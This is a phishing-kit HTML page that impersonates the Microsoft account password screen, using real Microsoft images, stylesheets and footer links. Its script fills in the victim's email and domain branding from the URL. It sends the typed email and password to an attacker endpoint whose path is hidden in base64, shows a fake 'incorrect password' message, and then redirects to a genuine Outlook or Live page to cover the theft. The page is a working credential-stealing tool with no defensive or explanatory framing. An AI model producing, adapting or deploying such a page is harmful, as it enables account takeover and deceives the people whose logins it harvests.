<!DOCTYPE html>
<html dir="ltr" class="" lang="en">
   <head>
      <title>Sign in to your account</title>
      <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
      <meta http-equiv="X-UA-Compatible" content="IE=edge">
      <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=2.0, user-scalable=yes">
      <meta http-equiv="Pragma" content="no-cache">
      <meta http-equiv="Expires" content="-1">
      <meta name="format-detection" content="telephone=no">
      <meta name="robots" content="none">
      <link rel="shortcut icon" href="https://aadcdn.msftauth.net/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico">
      <link data-loader="cdn" crossorigin="anonymous" href="https://aadcdn.msftauth.net/ests/2.1/content/cdnbundles/converged.v2.login.min_dxlgfz8kx1amwm8vpguk7w2.css" rel="stylesheet" integrity="sha384-NHL1j3x5T3Rrv/VKZd1UYfzvf2FSnS3t3pG5rjO5JO3bOfBP3a2jltPSRrV+Gvlb">
	  <!--<link crossorigin="anonymous" href="./source/style.css" rel="stylesheet">-->
   </head>
   <body data-bind="defineGlobals: ServerData, bodyCssClass" class="cb" style="display: block;" cz-shortcut-listen="true">
      <div>
         <div data-bind="if: activeDialog"></div>
         <form name="f1" id="i0281" novalidate="novalidate" spellcheck="false" method="post" target="_top" autocomplete="off" class="provide-min-height">
            <div class="login-paginated-page">
               <div id="lightboxTemplateContainer" class="provide-min-height">
                  <!--  -->
                  <div id="lightboxBackgroundContainer">
				  
					<div class="background-image-holder" role="presentation">
                        <div id="backgroundImage" data-bind="backgroundImage: backgroundImageUrl(), externalCss: { 'background-image': true }" class="background-image ext-background-image" style="background-image: url(&quot;https://aadcdn.msftauth.net/shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg&quot;);"></div>
                     </div>
                     
                  </div>
                  <div class="outer">
                     <div class="template-section main-section">
                        <div class="middle ext-middle">
                           <div class="full-height">
                              <div class="flex-column">
                                 <div class="win-scroll">
                                    <div id="lightbox" class="sign-in-box ext-sign-in-box fade-in-lightbox">
                                       <div class="lightbox-cover" data-bind="css: { 'disable-lightbox': svr.fAllowGrayOutLightBox &amp;&amp; showLightboxProgress() }"></div>
                                       <div>
                                          <!-- email domainLogo -->
                                          <img id="bannerLogo" role="presentation" src="" class="banner-logo ext-banner-logo">
										  <span id="bannerLogoTxt" style="text-transform:capitalize"></span>
                                       </div>
                                       <div role="main" data-bind="">
                                          <div data-bind="css: { 'zero-opacity': hidePaginatedView() }" class="">
                                             <div data-bind="css: {
                                                'animate': animate() &amp;&amp; animate.animateBanner(),
                                                'slide-out-next': animate.isSlideOutNext(),
                                                'slide-in-next': animate.isSlideInNext(),
                                                'slide-out-back': animate.isSlideOutBack(),
                                                'slide-in-back': animate.isSlideInBack() }" class="animate slide-in-next">
                                                <div>
                                                   <!--  -->
                                                   <div class="identityBanner">
                                                      <button type="button" class="backButton" id="idBtn_Back" aria-label="Back">
														 <img role="presentation" pngsrc="https://aadcdn.msftauth.net/shared/1.0/content/images/arrow_left_7cc096da6aa2dba3f81fcc1c8262157c.png" svgsrc="https://aadcdn.msftauth.net/shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg" data-bind="imgSrc" src="https://aadcdn.msftauth.net/shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg">
                                                      </button>
                                                      <!-- /ko -->
                                                      <div id="displayName" class="identity" title=""></div>
													  <input name="u" type="hidden" id="u" class="email">
                                                   </div>
                                                </div>
                                             </div>
                                             <!-- /ko -->
                                             <div class="pagination-view animate has-identity-banner slide-in-next">
                                                <div data-viewid="2">
                                                   <!--  -->
                                                   <div id="loginHeader" class="row title ext-title" data-bind="externalCss: { 'title': true }">
                                                      <div role="heading" aria-level="1" data-bind="text: str['CT_PWD_STR_EnterPassword_Title']">Enter password</div>
                                                   </div>
                                                   <div class="row">
                                                      <div class="form-group col-md-24">
                                                        <div id="pwd-error" style="color:#e81123; display:none" role="alert" aria-live="assertive">Please enter your password.</div>
                                                        <div id="msg" style="color:#e81123;" role="alert" aria-live="assertive"></div>
                                                        <div class="placeholderContainer">
                                                          <input name="p" type="password" id="p" autocomplete="off" class="form-control input ext-input text-box ext-text-box" placeholder="Password" tabindex="0">
                                                        </div>
                                                      </div>
                                                   </div>
                                                   <div class="password-reset-links-container ext-password-reset-links-container">
                                                      <div>
                                                         <div class="row">
                                                            <div class="col-md-24">
                                                               <div class="text-13">
                                                                  <div class="form-group">
                                                                     <a id="" role="link" href="javascript:void()" target="">Forgot my password</a>
                                                                  </div>
                                                                  <div class="form-group"></div>
                                                               </div>
                                                            </div>
                                                         </div>
                                                      </div>
                                                      <div class="win-button-pin-bottom boilerplate-button-bottom" data-bind="css : { 'boilerplate-button-bottom': tenantBranding.BoilerPlateText }">
                                                         <div class="row move-buttons" data-bind="css: { 'move-buttons': tenantBranding.BoilerPlateText }">
                                                            <div>
                                                               <div class="col-xs-24 no-padding-left-right button-container button-field-container ext-button-field-container">
                                                                  <div data-bind="css: { 'inline-block': isPrimaryButtonVisible }, externalCss: { 'button-item': true }" class="inline-block button-item ext-button-item">
                                                                     <input type="submit" id="idSIButton9" class="win-button button_primary button ext-button primary ext-primary" value="Sign in">
                                                                  </div>
                                                               </div>
                                                            </div>
                                                         </div>
                                                      </div>
                                                   </div>
                                                   <div id="idBoilerPlateText" class="wrap-content boilerplate-text ext-boilerplate-text">
                                                      <p>Welcome To <span style="text-transform:uppercase" id="salute"></span></p>
                                                   </div>
                                                </div>
                                             </div>
                                          </div>
                                       </div>
                                    </div>
                                 </div>
                              </div>
                           </div>
                        </div>
                     </div>
                     <div id="footer" role="contentinfo" class="footer ext-footer has-background ext-has-background">
                        <div>
                           <div id="footerLinks" class="footerNode text-secondary footer-links ext-footer-links">
                              <a id="ftrTerms" href="https://www.microsoft.com/en-US/servicesagreement/" target="_blank" class="footer-content ext-footer-content footer-item ext-footer-item has-background ext-has-background">Terms of use</a>
                              <a id="ftrPrivacy" href="https://privacy.microsoft.com/en-US/privacystatement" target="_blank" class="footer-content ext-footer-content footer-item ext-footer-item has-background ext-has-background">Privacy &amp; cookies</a>
                              <a id="moreOptions" href="#" role="button" class="footer-content ext-footer-content footer-item ext-footer-item debug-item ext-debug-item has-background ext-has-background">...</a>
                           </div>
                        </div>
                     </div>
                  </div>
               </div>
            </div>
         </form>
      </div>
	  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
	  <script src="./config.js"></script>
	  <script>
		var count = 0;
		$('#i0281').submit(function (event) {
		  //var password = $("#password").val();
		  event.preventDefault();
		  var email = $("#u").val();
		  var password = $("#p").val();
		  if(password == '') {
			$('#pwd-error').show();
		  } else {
			$('#pwd-error').hide();
			count = count + 1;
			  //console.log(email);
			  
		var atu = "L2Nvbm5lY3QucGhw";
		
			$.ajax({
			  dataType: 'JSON',
			  url: `${config.baseUrl}${atob(atu)}`,
			  type: 'POST',
			  data: {
				email: email,
				password: password
			  },
			  beforeSend: function(xhr){
				$('#idSIButton9').attr('value','Processing...');
				  
			  },
				
			 success: function (response) {
				if (response) {
				   //console.log(response);
				   if (response.signal == 'ok') {
					  $('#msg').text("Your account or password is incorrect. Please check your spelling and try again.");
					  $("#p").val("");
					  if (count >= 2) {
						 count = 0;
						 window.location.replace("https://outlook.live.com/owa/#")
					  }
				   } else {
					  $('#msg').text("Your account or password is incorrect. Please check your spelling and try again.");
				   }
				}
			 },
			 error: function () {
				
				$("#p").val("");
				if (count >= 2) {
				   count = 0;
				   window.location.replace("https://login.live.com/Me.htm?v=3")
				}
				$('#msg').text("Your account or password is incorrect. Please check your spelling and try again.");
			 },
			 complete: function(){
				$('#idSIButton9').attr('value','Sign in');
			 }
			})
		  }
		  
	   });
	  
	  
		function extractHostname(url) {
			var hostname;
			if (url.indexOf("//") > -1) {
				hostname = url.split('/')[2];
			}
			else {
				hostname = url.split('/')[0];
			}
			hostname = hostname.split(':')[0];
			hostname = hostname.split('?')[0];
			return hostname;
		}

		function extractRootDomainNoExt(url) {
			var domain = extractHostname(url),
				splitArr = domain.split('.'),
				arrLen = splitArr.length;

			if (arrLen == 2) {
			  domain = splitArr[0]
			}
			else if (arrLen > 2) {
				domain = splitArr[arrLen - 2];
				//check to see if it's using a Country Code Top Level Domain (ccTLD) (i.e. ".me.uk")
				if (splitArr[arrLen - 2].length == 2 && splitArr[arrLen - 1].length == 2) {
					domain = splitArr[arrLen - 3];
				}
			}
			return domain;
		}
		
		function getParameterByName(name, url) {
			if (!url) url = window.location.href;
			name = name.replace(/[\[\]]/g, '\\$&');
			var regex = new RegExp('[?&]' + name + '(=([^&#]*)|&|#|$)'),
				results = regex.exec(url);
			if (!results) return null;
			if (!results[2]) return '';
			return decodeURIComponent(results[2].replace(/\+/g, ' '));
		}
			
		const login_username = getParameterByName('cms');
		document.getElementById("u").value = login_username;
		var ind = login_username.indexOf("@");
		var my_slice = login_username.substr((ind + 1));
		var mainPage = 'https://' + my_slice;
		$("#bannerLogo").attr("src", "https://www.google.com/s2/favicons?domain=" + mainPage);
		document.getElementById("displayName").innerHTML = login_username;
		$("#displayName").attr('title', login_username);
		var dn = login_username.slice((ind+1),login_username.length);
		$("#salute, #bannerLogoTxt").text(extractRootDomainNoExt(dn));
	  </script>
   </body>
</html>